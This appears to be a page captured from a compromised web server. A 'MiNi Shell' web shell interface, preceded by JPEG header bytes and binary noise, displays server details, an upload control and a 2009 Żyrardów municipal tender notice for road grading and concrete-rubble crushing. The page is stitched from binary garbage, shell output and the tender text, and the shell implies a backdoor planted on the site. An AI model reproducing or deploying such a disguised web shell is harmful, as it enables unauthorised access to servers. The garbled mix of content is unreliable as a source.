JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090520/157446-N-2009.html

<p class="kh_header"><b>Żyrardów: Przedmiot zamówienia obejmuje dwa zadania :
1. RÓWNANIE Z PROFILOWANIEM ORAZ ULEPSZANIE 
    NAWIERZCHNI GRUNTOWYCH DRÓG MIESZANKĄ        
    BETONOWĄ,
2. KRUSZENIE  GRUZU BETONOWEGO</b><br>
<b>Numer ogłoszenia: 157446 - 2009; data zamieszczenia: 20.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Żyrardów Wydział Gospodarki Komunalnej , Plac Jana Pawła II 1, 96-300 Żyrardów, woj. mazowieckie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zyrardow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiot zamówienia obejmuje dwa zadania :
1. RÓWNANIE Z PROFILOWANIEM ORAZ ULEPSZANIE 
    NAWIERZCHNI GRUNTOWYCH DRÓG MIESZANKĄ        
    BETONOWĄ,
2. KRUSZENIE  GRUZU BETONOWEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia ( dla każdego zadania oddzielnie) jest zakres robót wyspecyfikowany w załączonych do niniejszej SIWZ Kosztorysach  ślepych - opis  robót i zakres tam zawarty stanowią podstawę do określenia ceny ofertowej dla danego zadania. 
Zamawiający zastrzega sobie możliwość zmiany ilości wykonywanych robót            z zachowaniem cen jednostkowych. Wskazana w Kosztorysach ślepych podstawa wyceny służy oferentowi jedynie jako informacja dotycząca uściślenia opisu robót, natomiast nie zobowiązuje Wykonawcy do wyceny robót w oparciu o ustalone podstawy. 
Wielkość wydatków wynikających z podpisanych umów na poszczególne zadania nie może przekroczyć wielkości wydatków budżetowych na powyższe zadania w danym roku kalendarzowym.
Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne zadania.
Dla zadania nr 1 - równanie z profilowaniem ( w ilości ok. 150 000,00 m2 w roku 2009 i ok. 300.000,00 m2 w roku 2010 ) oraz ulepszanie nawierzchni gruntowych dróg mieszanką betonową, rodzaj i ilość robót wyspecyfikowano w załączonym kosztorysie ślepym.
Dla zadania nr 2 - kruszenie gruzu betonowego w ilości szacunkowej do 2 500 m3 w rozbiciu na dwa etapy realizacji, pochodzącego z remontów dróg ( m.in. uszkodzone krawężniki, kostka betonowa, gruz betonowy, płyty betonowe, kamień ) na kruszywo do ponownego wykorzystania o frakcji max 0-50 mm. Produkt, którego obmiar zostanie dokonany po skruszeniu będzie stanowił podstawę do wyliczenia wynagrodzenia za realizację zadania.
Skruszony beton usypywany będzie w pryzmy, tworząc haudę kruszywa, na placu PEC, w miejscu wskazanym przez zamawiającego w Żyrardowie.   
W cenie brutto wykonania robót ( przekruszenie gruzu ) należy uwzględnić wszystkie koszty dodatkowe ( m.in. pracę ludzi, transport kruszarki, taśmociągu i ładowarki na miejsce wykonania usługi tj. Żyrardów ul.Jodłowskiego 82, podatek VAT )
Roboty winny być wykonywane w porze dnia w celu minimalizacji uciążliwości dla mieszkańców. Zakres i ilość robót według załączonego kosztorysu ślepego może ulec zmianie.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.23.15.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Za spełnienie tego warunku uznaje się złożenie dokumentów określonych w pkt.16 ppkt.16.3 SIWZ, jak również złożenie oświad-czenia określonego w pkt.16 ppkt.16.4, pkt 16 ppkt 8.
2.posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia, t.j. wykonali w okresie ostatnich trzech lat min. 2 zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, odpowiadającym swoim rodzajem, wartością robotom stano-wiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. 
    Za spełnienie tego warunku uznaje się złożenie dokumentów określonych w pkt 16 ppkt16.7, ppkt.16.8 SIWZ
3.posiadają niezbędny potencjał techniczny do wykonania zamówienia, t.j. dysponują spraw-nym sprzętem niezbędnym do realizacji przedmiotowego zamówienia dla poszczególnych zadań m.in. 
- dla zadnia nr 1 : równiarka, walec samojezdny, koparko -spycharka, samochód samowyładowczy,  
- dla zadania 2 : kruszarka, samochód samowyładowczy
   Za spełnienie tego warunku uznaje się złożenie dokumentów określonych w pkt.16 ppkt.16.9 SIWZ.  
4.dysponują osobami zdolnymi do wykonania zamówienia, z podziałem na 2 zadania, operator równiarki, operator walca, operator kruszarki, kierowca uprawniony do prowadzenia powyższego sprzętu. 
    Osoby nadzoru posiadające odpowiednie uprawnienia, dla zadania nr 1 m.in. uprawnienia budowlane drogowe z zaświadczeniem z właściwej Izby Inżynierów Budownictwa, osoby posiadające uprawnienia do kierowania specjalistycznym sprzętem koniecznym do realizacji przedmiotowych robót - dla każdego z zadań oddzielnie. Za spełnienie tego warunku uznaje się złożenie dokumentów określonych w pkt. 16 ppkt. 16.8 SIWZ
5.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Za spełnienie tego warunku uznaje się złożenie dokumentów określonych w pkt.16 ppkt. 16.10 SIWZ
6.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia -art. 22 ust. 1 ustawy Pzp. Za spełnienie tego warunku uznaje się złożenie dokumentu określonego w pkt.16 ppkt 16.4 SIWZ 
Ocena spełniania w.w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia,w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 16 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w.w warunki wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.wypełniony formularz ofertowy - dla zadania-ń  którym-mi wykonawca jest        zainteresowany -wg załączonego druku - Załącznik Nr 1
2.jednostkowe kosztorysy ofertowe dla poszczególnych zadań sporządzone w oparciu o przedłożone Kosztorysy ślepe dla poszczególnych zadań, stanowiące załącznik do SIWZ -  Załącznik Nr 2
3.aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej,wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
4.oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust. 1 ustawy - Załącznik Nr 3;
5.aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
6.aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub za-świadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zale-głych płatności wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert ;
7.wykaz wykonanych w okresie ostatnich trzech lat min. dwóch usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, dla zadania nr 1 - min. 200.000,00 zł każda z usług, dla zadania nr 2 - min. 80.000,00 zł każda z usług, przedmiotu, oraz dat wykonania i nazw odbiorców oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie, wg zał.- Załącznik Nr 4,
8.wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - dla zadania nr 1- m.in. uprawnienia budowlane drogowe z zaświadczeniem z właściwej Izby Inżynierów Budownictwa, informacja o posiadanych uprawnieniach do kiero-wania specjalistycznym sprzętem dla operatorów sprzętu -wg zał.- Załącznik Nr 5,
9.wykazu niezbędnego do wykonania zamówienia sprzętu, jakim dysponuje wykonawca dla określonego zadania -wg zał. Załącznik Nr 6 
10.aktualna polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą niż 200.00,00 zł ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zyrardow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żyrardowa, Plac Jana Pawła II nr 1, 96-300 Żyrardów, pok. nr 29.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2009 godzina 12:00, miejsce: Urząd Miasta Żyrardowa, Plac Jana Pawła II nr1 pok. nr 29.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1. RÓWNANIE  Z  PROFILOWANIEM ORAZ  ULEPSZANIE  NAWIERZCHNI  GRUNTOWYCH DRÓG  MIESZANKĄ  BETONOWĄ,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - równanie z profilowanie, w ilości ok. 150 000,00 m2 w roku 2009 i ok. 300.000,00 m2 w roku 2010 ) oraz ulepszanie nawierzchni gruntowych dróg mieszanką betonową, rodzaj i ilość robót wyspecyfikowano w załączonym kosztorysie ślepym..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.23.15.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KRUSZENIE  GRUZU BETONOWEGO.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kruszenie gruzu betonowego w ilości szacunkowej do 2 500 m3 w rozbiciu na dwa etapy realizacji, pochodzącego z remontów dróg, m.in. uszkodzone krawężniki, kostka betonowa, gruz betonowy, płyty betonowe, kamień, na kruszywo do ponownego wykorzystania o frakcji max 0-50 mm. Produkt, którego obmiar zostanie dokonany po skruszeniu będzie stanowił podstawę do wyliczenia wynagrodzenia za realizację zadania.
Skruszony beton usypywany będzie w pryzmy, tworząc haudę kruszywa, na placu PEC,w miejscu wskazanym przez zamawiającego w Żyrardowie.   
W cenie brutto wykonania robót, przekruszenie gruzu, należy uwzględnić wszystkie koszty dodatkowe, m.in. pracę ludzi, transport kruszarki, taśmociągu i ładowarki na miejsce wykonania usługi tj. Żyrardów ul.Jodłowskiego 82, podatek VAT. 
Roboty winny być wykonywane w porze dnia w celu minimalizacji uciążliwości dla mieszkańców. Zakres i ilość robót według załączonego kosztorysu ślepego może ulec zmianie                                                                                                                                                                                                                                                                                         ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.23.15.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com